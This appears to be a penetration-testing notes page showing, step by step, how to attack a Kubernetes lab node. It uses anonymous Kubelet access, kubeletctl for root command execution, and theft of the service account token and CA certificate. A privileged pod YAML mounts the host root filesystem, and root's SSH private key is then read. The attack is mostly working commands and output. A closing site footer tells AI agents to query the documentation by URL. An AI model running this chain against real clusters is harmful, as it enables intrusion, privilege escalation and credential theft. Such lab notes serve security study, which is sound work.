# Kubernetes {% content-ref url="/pages/GBdexkaWxuN8L4JU2tAJ" %} [Kubernetes](/0xss0rz/cloud/kubernetes.md) {% endcontent-ref %} By default, the Kubelet allows anonymous access. ## **K8's API Server Interaction** ```shell-session $ curl https://10.129.10.11:6443 -k { "kind": "Status", "apiVersion": "v1", "metadata": {}, "status": "Failure", "message": "forbidden: User \"system:anonymous\" cannot get path \"/\"", "reason": "Forbidden", "details": {}, "code": 403 } ``` By default, access to the root path is generally restricted to authenticated and authorized users with administrative privileges and the API server denied the request ## **Extracting Pods** ### Kubelet API ```shell-session $ curl https://10.129.10.11:10250/pods -k | jq . ...SNIP... { "kind": "PodList", "apiVersion": "v1", "metadata": {}, "items": [ { "metadata": { "name": "nginx", "namespace": "default", "uid": "aadedfce-4243-47c6-ad5c-faa5d7e00c0c", "resourceVersion": "491", "creationTimestamp": "2023-07-04T10:42:02Z", "annotations": { "kubectl.kubernetes.io/last-applied-configuration": "{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"annotations\":{},\"name\":\"nginx\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"image\":\"nginx:1.14.2\",\"imagePullPolicy\":\"Never\",\"name\":\"nginx\",\"ports\":[{\"containerPort\":80}]}]}}\n", "kubernetes.io/config.seen": "2023-07-04T06:42:02.263953266-04:00", "kubernetes.io/config.source": "api" }, "managedFields": [ { "manager": "kubectl-client-side-apply", "operation": "Update", "apiVersion": "v1", "time": "2023-07-04T10:42:02Z", "fieldsType": "FieldsV1", "fieldsV1": { "f:metadata": { "f:annotations": { ".": {}, "f:kubectl.kubernetes.io/last-applied-configuration": {} } }, "f:spec": { "f:containers": { "k:{\"name\":\"nginx\"}": { ".": {}, "f:image": {}, "f:imagePullPolicy": {}, "f:name": {}, "f:ports": { ...SNIP... ``` ### **Kubeletctl** ```shell-session $ kubeletctl -i --server 10.129.10.11 pods ┌────────────────────────────────────────────────────────────────────────────────┐ │ Pods from Kubelet │ ├───┬────────────────────────────────────┬─────────────┬─────────────────────────┤ │ │ POD │ NAMESPACE │ CONTAINERS │ ├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤ │ 1 │ coredns-78fcd69978-zbwf9 │ kube-system │ coredns │ │ │ │ │ │ ├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤ │ 2 │ nginx │ default │ nginx │ │ │ │ │ │ ├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤ │ 3 │ etcd-steamcloud │ kube-system │ etcd │ │ │ │ │ │ ├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤ ``` ## **Available Commands** ```shell-session $ kubeletctl -i --server 10.129.10.11 scan rce ┌─────────────────────────────────────────────────────────────────────────────────────────────────────┐ │ Node with pods vulnerable to RCE │ ├───┬──────────────┬────────────────────────────────────┬─────────────┬─────────────────────────┬─────┤ │ │ NODE IP │ PODS │ NAMESPACE │ CONTAINERS │ RCE │ ├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤ │ │ │ │ │ │ RUN │ ├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤ │ 1 │ 10.129.10.11 │ nginx │ default │ nginx │ + │ ├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤ │ 2 │ │ etcd-steamcloud │ kube-system │ etcd │ - │ ├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤ ``` ## **Executing Commands** ```shell-session $ kubeletctl -i --server 10.129.10.11 exec "id" -p nginx -c nginx uid=0(root) gid=0(root) groups=0(root) ``` ## Privilege Escalation ### **Extracting Tokens** ```shell-session $ kubeletctl -i --server 10.129.10.11 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx | tee -a k8.token eyJhbGciOiJSUzI1NiIsImtpZC...SNIP...UfT3OKQH6Sdw ``` ### **Extracting Certificates** ```shell-session $ kubeletctl --server 10.129.10.11 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx | tee -a ca.crt -----BEGIN CERTIFICATE----- MIIDBjCCAe6gAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQDEwptaW5p MhxgN4lKI0zpxFBTpIwJ3iZemSfh3pY2UqX03ju4TreksGMkX/hZ2NyIMrKDpolD 602eXnhZAL3+dA== -----END CERTIFICATE----- ``` Now that we have both the `token` and `certificate`, we can check the access rights in the Kubernetes cluster. ### **List Privileges** ```shell-session $ export token=`cat k8.token` $ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.10.11:6443 auth can-i --list Resources Non-Resource URLs Resource Names Verbs selfsubjectaccessreviews.authorization.k8s.io [] [] [create] selfsubjectrulesreviews.authorization.k8s.io [] [] [create] pods [] [] [get create list] ...SNIP... ``` `get`, `create`, and `list` pods Create a `YAML` file that we can use to create a new container and mount the entire root filesystem from the host system into this container's `/root` director ### **Pod YAML** ```yaml apiVersion: v1 kind: Pod metadata: name: privesc namespace: default spec: containers: - name: privesc image: nginx:1.14.2 volumeMounts: - mountPath: /root name: mount-root-into-mnt volumes: - name: mount-root-into-mnt hostPath: path: / automountServiceAccountToken: true hostNetwork: true ``` ### **Creating a new Pod** ```shell-session $ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.96.98:6443 apply -f privesc.yaml pod/privesc created $ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.96.98:6443 get pods NAME READY STATUS RESTARTS AGE nginx 1/1 Running 0 23m privesc 1/1 Running 0 12s ``` ### **Extracting Root's SSH Key** ```shell-session $ kubeletctl --server 10.129.10.11 exec "cat /root/root/.ssh/id_rsa" -p privesc -c privesc -----BEGIN OPENSSH PRIVATE KEY----- ...SNIP... ``` ## Dirty Pipe Container Escape {% embed url="" %} ## Tools {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/kubernetes.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.